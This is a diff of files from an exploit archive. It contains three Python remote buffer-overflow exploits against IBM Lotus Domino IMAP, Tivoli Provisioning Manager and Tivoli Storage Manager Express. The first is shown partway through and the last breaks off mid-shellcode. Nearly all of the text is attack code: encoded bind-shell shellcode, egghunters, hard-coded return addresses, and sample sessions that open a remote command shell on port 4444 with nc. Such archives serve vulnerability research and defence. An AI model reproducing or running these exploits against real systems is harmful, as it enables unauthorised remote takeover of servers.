-	"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
+	"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
-	"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
+	"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
-	"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
+	"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
-	"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
+	"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
-	"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
+	"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
-	"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
+	"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
-	"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
+	"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
-	"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
+	"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
-	"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
+	"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
-	"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
+	"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
-	"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
+	"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
-	"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
+	"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
-	"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
+	"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
-	"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
+	"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
-	"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
+	"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
-	"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
+	"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
-	"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
+	"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
-
+
-	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	sock.connect((target, 143))
+	sock.connect((target, 143))
-	response = sock.recv(1024)
+	response = sock.recv(1024)
-	bind = 'a001 admin ' + bindshell +'\r\n'
+	bind = 'a001 admin ' + bindshell +'\r\n'
-	print "[*] Sending bindshell *somewhere* into memory"
+	print "[*] Sending bindshell *somewhere* into memory"
-	sock.send(bind)
+	sock.send(bind)
-	response = sock.recv(1024)
+	response = sock.recv(1024)
-	sock.close()
+	sock.close()
-
+
-def ExploitLotus(target):
+def ExploitLotus(target):
-	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-	sock.connect((target, 143))
+	sock.connect((target, 143))
-	response = sock.recv(1024)
+	response = sock.recv(1024)
-	print response
+	print response
-	auth = 'a001 authenticate cram-md5\r\n'
+	auth = 'a001 authenticate cram-md5\r\n'
-	sock.send(auth)
+	sock.send(auth)
-	response = sock.recv(1024)
+	response = sock.recv(1024)
-	print response
+	print response
-	m = md5.new()
+	m = md5.new()
-	m.update(response[2:0])
+	m.update(response[2:0])
-	digest = m.digest()
+	digest = m.digest()
-	payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
+	payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
-
+
-	# 0x774b4c6a CALL [EAX +4]
+	# 0x774b4c6a CALL [EAX +4]
-
+
-	payload += "jLKw"
+	payload += "jLKw"
-	payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
+	payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
-	login = payload + ' ' + digest
+	login = payload + ' ' + digest
-	login = base64.encodestring(login) + '\r\n'
+	login = base64.encodestring(login) + '\r\n'
-	print "[*] Triggering overwrite, ph33r."
+	print "[*] Triggering overwrite, ph33r."
-	sock.send(login)
+	sock.send(login)
-	sock.close()
+	sock.close()
-	print "[*] You may need to wait up to 2 minutes"
+	print "[*] You may need to wait up to 2 minutes"
-	print "[*] for egghunter to find da shell."
+	print "[*] for egghunter to find da shell."
-
+
-if __name__=="__main__":
+if __name__=="__main__":
-	try:
+	try:
-		target = sys.argv[1]
+		target = sys.argv[1]
-	except IndexError:
+	except IndexError:
-		print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
+		print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
-		print '[*] Usage: %s <imap server>\n' % sys.argv[0]
+		print '[*] Usage: %s <imap server>\n' % sys.argv[0]
-		
+		
-		sys.exit(-1)
+		sys.exit(-1)
-	
+	
-	print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
+	print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
-	sendbind(target)
+	sendbind(target)
-	sendbind(target)
+	sendbind(target)
-	sendbind(target)
+	sendbind(target)
-	sendbind(target)
+	sendbind(target)
-	ExploitLotus(target)
+	ExploitLotus(target)
-
+
-# milw0rm.com [2007-03-31]
+# milw0rm.com [2007-03-31]
--- a/platforms/windows/remote/4027.py
+++ b/platforms/windows/remote/4027.py
@ -1,107 +1,107 @@
-#!/usr/bin/python
+#!/usr/bin/python
-#
+#
-# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
+# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
-# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
+# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
-# Tested on windows 2003 server SP0. 
+# Tested on windows 2003 server SP0. 
-# Coded by Mati Aharoni
+# Coded by Mati Aharoni
-# muts@offensive-security.com
+# muts@offensive-security.com
-# http://www.offensive-security.com/0day/ibm-ti-pro.py
+# http://www.offensive-security.com/0day/ibm-ti-pro.py
-# Notes:
+# Notes:
-# * Egghunter can take upto 5 minutes to find the shell.
+# * Egghunter can take upto 5 minutes to find the shell.
-#
+#
-# bt ~ # ./ibm-ti-pro.py 192.168.9.32
+# bt ~ # ./ibm-ti-pro.py 192.168.9.32
-# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
+# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
-# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
+# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
-# [*] muts@offensive-security.com
+# [*] muts@offensive-security.com
-#
+#
-# [*] Sending evil payload to 192.168.9.32:8080
+# [*] Sending evil payload to 192.168.9.32:8080
-# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
+# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
-# [*] Happy Hunting!
+# [*] Happy Hunting!
-#
+#
-# bt ~ # nc -nv 192.168.9.32 4444
+# bt ~ # nc -nv 192.168.9.32 4444
-# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
+# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
-# Microsoft Windows [Version 5.2.3790]
+# Microsoft Windows [Version 5.2.3790]
-# (C) Copyright 1985-2003 Microsoft Corp.
+# (C) Copyright 1985-2003 Microsoft Corp.
-#
+#
-# C:\WINDOWS\system32>
+# C:\WINDOWS\system32>
-
+
-import socket
+import socket
-import os
+import os
-import sys
+import sys
-
+
-def banner():
+def banner():
-        print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
+        print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
-        print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
+        print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
-        print "[*] muts@offensive-security.com"
+        print "[*] muts@offensive-security.com"
- 
+ 
-if len(sys.argv)!=2:
+if len(sys.argv)!=2:
-        banner()
+        banner()
-        print "[*] Usage: ibm-ti-pro.py <ip>\n"
+        print "[*] Usage: ibm-ti-pro.py <ip>\n"
-        sys.exit(0)
+        sys.exit(0)
-
+
-#77E0211B   FFD4             CALL ESP Win2k SP0
+#77E0211B   FFD4             CALL ESP Win2k SP0
-banner()
+banner()
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8080 ) )
+expl.connect ( ( sys.argv[1], 8080 ) )
-
+
-# Payload #1
+# Payload #1
-sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
-"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
-
+
-# Payload #2
+# Payload #2
-# win32_bind -  LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
+# win32_bind -  LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
-
+
-bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
+bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
-"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
+"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
+"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
-"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
+"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
-"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
+"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
-"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
+"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
-"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
+"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
-"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
+"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
-"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
+"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
-"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
+"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
-"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
+"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
-"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
+"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
-"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
+"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
-"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
+"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
-"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
+"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
-"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
+"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
-"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
+"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
-"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
+"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
-"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
+"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
-"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
+"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
-"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
+"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
-"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
+"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
+"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
-"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
+"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
-"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
+"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
-"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
+"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
-"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
+"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
-"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
+"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
-"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
+"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
-"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
+"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
-"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
+"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
-"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
+"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
-"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
+"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
-"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
+"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
-"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
+"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
-"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
+"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
-"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
+"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
-"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
+"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
-"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
+"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
-
+
-print "[*] Sending evil payload to "+sys.argv[1] +":8080"
+print "[*] Sending evil payload to "+sys.argv[1] +":8080"
-expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n')
+expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n')
-print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell"
+print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell"
-print "[*] Happy Hunting!"
+print "[*] Happy Hunting!"
-expl.close()
+expl.close()
-
+
-# milw0rm.com [2007-06-03]
+# milw0rm.com [2007-06-03]
--- a/platforms/windows/remote/4573.py
+++ b/platforms/windows/remote/4573.py
@ -1,100 +1,100 @@
-#!/usr/bin/python
+#!/usr/bin/python
-#
+#
-# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
+# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
-# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
+# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
-# Tested on windows 2003 server SP0. 
+# Tested on windows 2003 server SP0. 
-# Coded by Mati Aharoni
+# Coded by Mati Aharoni
-# muts.at.offensive-security.com
+# muts.at.offensive-security.com
-# http://www.offensive-security.com/0day/dsmcad.py.txt
+# http://www.offensive-security.com/0day/dsmcad.py.txt
-#
+#
-# bt ~ # ./dsmcad.py 192.168.1.107
+# bt ~ # ./dsmcad.py 192.168.1.107
-# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
+# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
-# [*] http://www.offensive-security.com
+# [*] http://www.offensive-security.com
-# [*] Connecting to 192.168.1.107
+# [*] Connecting to 192.168.1.107
-# [*] Sending evil buffer, ph33r
+# [*] Sending evil buffer, ph33r
-# [*] Check port 4444 for bindshell
+# [*] Check port 4444 for bindshell
-#
+#
-# bt ~ # nc -v 192.168.1.107 4444
+# bt ~ # nc -v 192.168.1.107 4444
-# 192.168.1.107: inverse host lookup failed: Unknown host
+# 192.168.1.107: inverse host lookup failed: Unknown host
-# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
+# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
-# Microsoft Windows [Version 5.2.3790]
+# Microsoft Windows [Version 5.2.3790]
-# (C) Copyright 1985-2003 Microsoft Corp.
+# (C) Copyright 1985-2003 Microsoft Corp.
-#
+#
-# E:\Program Files\Tivoli\TSM\baclient>
+# E:\Program Files\Tivoli\TSM\baclient>
-
+
-import socket
+import socket
-import sys
+import sys
-
+
-print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
+print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
-print "[*] http://www.offensive-security.com"
+print "[*] http://www.offensive-security.com"
-
+
-def usage():
+def usage():
-	print "[*] Usage: ./dsmcad.py <host>"
+	print "[*] Usage: ./dsmcad.py <host>"
-	sys.exit(1)
+	sys.exit(1)
-
+
-if len(sys.argv) != 2:
+if len(sys.argv) != 2:
-	usage()
+	usage()
-
+
-buffer="BirdsflyinghighyouknowhowIfeel"
+buffer="BirdsflyinghighyouknowhowIfeel"
-buffer+="SunintheskyyouknowhowIfeel"
+buffer+="SunintheskyyouknowhowIfeel"
-buffer+="ReeedsdriftinonbyyouknowhowIfeel"
+buffer+="ReeedsdriftinonbyyouknowhowIfeel"
-buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
+buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
-buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
+buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"
-
+
-buffer+="\x38\x07\xD2\x77"	#77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
+buffer+="\x38\x07\xD2\x77"	#77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
-buffer+="\x90"*4
+buffer+="\x90"*4
-buffer+=(
+buffer+=(
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49"
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
-"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
+"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x71\x41\x32\x41\x41\x32"
-"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
+"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x68\x69\x49\x6c\x31"
-"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
+"\x7a\x68\x6b\x62\x6d\x49\x78\x4b\x49\x39\x6f\x6b\x4f\x39\x6f\x33"
-"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
+"\x50\x4e\x6b\x52\x4c\x34\x64\x74\x64\x6e\x6b\x42\x65\x67\x4c\x6c"
-"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
+"\x4b\x41\x6c\x46\x65\x42\x58\x57\x71\x7a\x4f\x6c\x4b\x50\x4f\x65"
-"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
+"\x48\x4e\x6b\x71\x4f\x51\x30\x37\x71\x58\x6b\x77\x39\x4e\x6b\x75"
-"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
+"\x64\x4c\x4b\x53\x31\x5a\x4e\x44\x71\x4b\x70\x6f\x69\x6e\x4c\x6c"
-"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
+"\x44\x69\x50\x42\x54\x45\x57\x4f\x31\x7a\x6a\x36\x6d\x54\x41\x6b"
-"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
+"\x72\x78\x6b\x69\x64\x47\x4b\x50\x54\x36\x44\x64\x68\x43\x45\x4a"
-"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
+"\x45\x6e\x6b\x41\x4f\x56\x44\x65\x51\x48\x6b\x75\x36\x6c\x4b\x64"
-"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
+"\x4c\x50\x4b\x6e\x6b\x71\x4f\x77\x6c\x34\x41\x48\x6b\x53\x33\x66"
-"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
+"\x4c\x6e\x6b\x4b\x39\x30\x6c\x36\x44\x65\x4c\x51\x71\x4f\x33\x57"
